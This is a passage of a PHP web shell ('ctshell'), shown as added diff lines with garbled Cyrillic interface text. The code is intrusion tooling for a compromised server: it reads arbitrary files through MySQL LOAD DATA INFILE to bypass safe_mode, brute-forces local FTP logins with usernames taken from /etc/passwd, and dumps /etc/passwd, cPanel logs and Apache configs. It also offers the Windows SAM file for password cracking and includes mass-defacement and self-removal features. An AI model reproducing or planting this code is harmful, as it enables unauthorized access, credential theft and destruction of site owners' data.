@mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();} + } + else {$sql_sock = false;} + echo "<b>جهيهنوهً SQL:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "حإز رآكاب";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$sul."act=sql"); + + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center> +<li>إٌëè ëîمèي ےâëےهٌٍے ïٌٍَûى, ëîمèي - âëàنهëهِ ïًîِهٌٌà. </li> +<li>إٌëè ُîçےèي ےâëےهٌٍے ïٌٍَûى, ُîçےèي - localhost </li> +<li>إٌëè ïîًٍ ےâëےهٌٍے ïٌٍَûى, ïîًٍ - 3306 (يهïëàٍهو)</li></td> +<td class=td2 width="90%" height="1" valign="top"> +<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2> +<td class=td2>&nbsp;<b><font size=2 color=#000000>اàïîëيèٍه ôîًىَ:</font></b><table><tr class=tr2><td class=td2>بىے:</td> +<td class=td2 align=right>دàًîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr> +<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td class=td2 align=right> +<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>صîٌٍ:</td> +<td class=td2>دîًٍ:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td> +<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="رîهنèيèٍهٌü"></td></tr><tr> +<td class=td2></td></tr></form></table></td><?php } + else + { + if (!empty($sql_db)) + { +?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php +$result = mysql_list_tables($sql_db); +if (!$result) {echo mysql_error();} +else +{ + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b> +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} +} + } + else + { +?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php +$result = mysql_list_dbs($sql_sock); +if (!$result) {echo mysql_error();} +else +{ + ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + echo "<option value=\"\">Databases (...)</option> +"; + $c = 0; + while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option> +"; $c++;} +} +?></select><hr size="1" noshade>دîوàëَéٌٍà, âûلهًèٍه لàçَ نàييûُ<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + if ($sql_db) + { +echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>"; +if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} +echo "</b></center>"; + +$acts = array("","dump"); + +if ($sql_act == "query") +{ + echo "<hr size=\"1\" noshade>"; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";} +} +if (in_array($sql_act,$acts)) +{ + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtpl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} +} +elseif ($sql_act == "dump") +{ + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: ctshell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} +} +else +{ + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>"; + echo "<td><center><b>Table</b></center></td>"; + echo "<td><b>Rows</b></td>"; + echo "<td><b>Type</b></td>"; + echo "<td><b>Created</b></td>"; + echo "<td><b>Modified</b></td>"; + echo "<td><b>Size</b></td>"; + echo "<td><b>Action</b></td>"; + echo "</tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>"; + echo "<td>".$row[3]."</td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td>".$size."</td>"; + echo "<td> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a> +<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp; +</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\"> +<option>With selected:</option> +<option value=\"drop\" >Drop</option> +<option value=\"empty\" >Empty</option> +<option value=\"chk\">Check table</option> +<option value=\"Optimize table\">Optimize table</option> +<option value=\"Repair table\">Repair table</option> +<option value=\"Analyze table\">Analyze table</option> +</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>"; + mysql_free_result($result); +} + } + } + else + { +$acts = array("","newdb","serverstat","servervars","processes","getfile"); +if (in_array($sql_act,$acts)) +{ + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>رîçنàéٍه يîâûé ءàçَ:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="رîçنàٍü"></form></td><td width="30%" height="1"><b>دًèٌىîًٍهٍü شàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="آçےٍü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php +} +if (!empty($sql_act)) +{ + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>دًîِهٌٌû:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { +for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} +$f = ""; +while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}} +if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";} +else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } +} + } + } + echo "</tr></table></table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}} + echo "<br><br>"; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if ($win) {echo "This functions not work in Windows!<br><br>";} + else + { + function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { +if ($fqb_onlywithsh) +{ + if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;} + else {$true = true;} +} +else {$true = true;} +if ($true) +{ + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } +} + } + if (!empty($submit)) + { +if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} +$fp = fopen("/etc/passwd","r"); +if (!$fp) {echo "Can't get /etc/passwd for password-list.";} +else +{ + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { +$success++; + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>"; +} + } + else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";} + } +} +if ($act == "lsa") +{ + echo "<center><b>بيôîًىàِèے لهçîïàٌيîٌٍè ٌهًâهًà:</b></center>"; + echo "<b>دًîمًàىىيîه îلهٌïه÷هيèه:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>"; + echo "<b>ءهçîïàٌيîٌٍü: ".$hsafemode."</b><br>"; + echo "<b>خٍêًûٍûé îٌيîâيîé نèًهêٍîً: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { +if ($nixpasswd == 1) {$nixpasswd = 0;} +$num = $nixpasswd + $nixpwdperpage; +echo "<b>*nix /etc/passwd:</b><br>"; +$i = $nixpasswd; +while ($i < $num) +{ + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."<br>";} + $i++; +} + } + else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=\"green\">آû ىîوهٍه âçëîىàٍü winnt ïàًîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>رêà÷àٍü</b></u></a>, c èٌïîëüçîâàيèه lcp.crack+.</font></b><br>";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else + { + echo "<b>File-System buffer</b><br><br>"; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";} + $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>"; + shuffle($v); + $v = join("&nbsp;&nbsp;&nbsp;",$v); + echo "<b>رàىîَنàëèٍü: ".__FILE__." <br>آû َâهًهييû?</b><center>".$v."</center>"; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( +"name"=>$deface_name, "name_regexp"=>$deface_name_regexp, +"text"=>$text, "text_regexp"=>$text_regxp, +"text_wwo"=>$deface_text_wwo, +"text_cs"=>$deface_text_cs, +"text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {ctfsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { +$ls_arr = $found; +$disp_fullpath = true; +$act = $dspact = "ls"; + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + + } + echo "<form method=\"POST\">"; + if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";} + echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp +<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\"> +<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b> +<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea> +<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( +"name"=>$search_name, "name_regexp"=>$search_name_regexp, +"text"=>$search_text, "text_regexp"=>$search_text_regxp, +"text_wwo"=>$search_text_wwo, +"text_cs"=>$search_text_cs, +"text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { +ctfsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { +$ls_arr = $found; +$disp_fullpath = true; +$act = $dspact = "ls"; + } + } + echo "<form method=\"POST\"> +<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";} +} +if ($act == "chmod") +{ + $perms = fileperms($d.$f); + if (!$perms) {echo "Can't get current mode.";} + elseif ($submit) + { + if (!isset($owner[0])) {$owner[0] = 0;} + if (!isset($owner[1])) {$owner[1] = 0; } + if (!isset($owner[2])) {$owner[2] = 0;} + if (!isset($group[0])) {$group[0] = 0;} + if (!isset($group[1])) {$group[1] = 0;} + if (!isset($group[2])) {$group[2] = 0;} + if (!isset($world[0])) {$world[0] = 0;} + if (!isset($world[1])) {$world[1] = 0;} + if (!isset($world[2])) {$world[2] = 0;} + $sum_owner = $owner[0] + $owner[1] + $owner[2]; + $sum_group = $group[0] + $group[1] + $group[2]; + $sum_world = $world[0] + $world[1] + $world[2]; + $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; + $ret = @chmod($d.$f, $sum_chmod); + if ($ret) {$act = "ls";} + else {echo "<b>بçىهيهيèه ہًٍèلٍَ شàéëà (".$d.$f.")</b>: خّèلêà<br>";} + } + else + { + echo "<center><b>بçىهيهيèه ہًٍèلٍَ شàéëà</b><br>"; + $perms = view_perms(fileperms($d.$f)); + $length = strlen($perms); + $owner_r = $owner_w = $owner_x = + $group_r = $group_w = $group_x = + $world_r = $world_w = $group_x = ""; + + if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";} + if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";} + if ($perms[5] == "w") {$group_w = " 